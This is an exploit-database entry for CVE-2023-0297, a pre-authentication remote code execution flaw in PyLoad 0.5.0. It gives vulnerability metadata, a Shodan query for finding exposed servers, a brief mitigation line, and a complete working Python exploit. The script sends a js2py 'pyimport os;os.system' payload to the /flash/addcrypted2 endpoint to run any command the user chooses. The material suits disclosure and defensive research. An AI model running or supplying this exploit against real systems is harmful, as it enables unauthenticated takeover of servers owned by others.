PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)

vendor:

PyLoad

by:

Gabriel Lima (0xGabe)

9.8

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: PyLoad

Affected Version From: 0.5.0

Affected Version To: 0.5.0

Patch Exists: NO

Related CWE: CVE-2023-0297

CPE: a:pyload:pyload:0.5.0

Metasploit:

Other Scripts:

Tags: huntr,packetstorm,cve,cve2023,rce,pyload,oast

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://www.exploit-db.com/exploits/51532, https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/, https://nvd.nist.gov/vuln/detail/CVE-2022-1058, http://packetstormsecurity.com/files/171096/pyLoad-js2py-Python-Execution.html, http://packetstormsecurity.com/files/172914/PyLoad-0.5.0-Remote-Code-Execution.html

Nuclei Metadata: {'max-request': 2, 'verified': True, 'shodan-query': 'html:"pyload"', 'vendor': 'pyload', 'product': 'pyload'}

Platforms Tested: Ubuntu 20.04.6

2023

PyLoad 0.5.0 – Pre-auth Remote Code Execution (RCE)

This exploit allows an attacker to execute arbitrary commands on the target system without authentication. By sending a specially crafted payload to the /flash/addcrypted2 endpoint, the attacker can execute commands through the os.system() function.

Mitigation:

To mitigate this vulnerability, it is recommended to update PyLoad to a patched version or apply any security patches provided by the vendor.

Source

Exploit-DB raw data:

# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
# Date: 06-10-2023
# Credits: bAu @bauh0lz 
# Exploit Author: Gabriel Lima (0xGabe)
# Vendor Homepage: https://pyload.net/
# Software Link: https://github.com/pyload/pyload
# Version: 0.5.0
# Tested on: Ubuntu 20.04.6
# CVE: CVE-2023-0297

import requests, argparse

parser = argparse.ArgumentParser()
parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')
parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')
arguments = parser.parse_args()

def doRequest(url):
    try:
        res = requests.get(url + '/flash/addcrypted2')
        if res.status_code == 200:
            return True
        else:
            return False

    except requests.exceptions.RequestException as e:
        print("[!] Maybe the host is offline :", e)
        exit()

def runExploit(url, cmd):
    endpoint = url + '/flash/addcrypted2'
    if " " in cmd:
        validCommand = cmd.replace(" ", "%20")
    else:
        validCommand = cmd

    payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
    test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)
    print('[+] The exploit has be executeded in target machine. ')

def main(targetUrl, Command):
    print('[+] Check if target host is alive: ' + targetUrl)
    alive = doRequest(targetUrl)
    if alive == True:
        print("[+] Host up, let's exploit! ")
        runExploit(targetUrl,Command)
    else:
        print('[-] Host down! ')

if(arguments.url != None and arguments.cmd != None):
    targetUrl = arguments.url
    Command = arguments.cmd
    main(targetUrl, Command)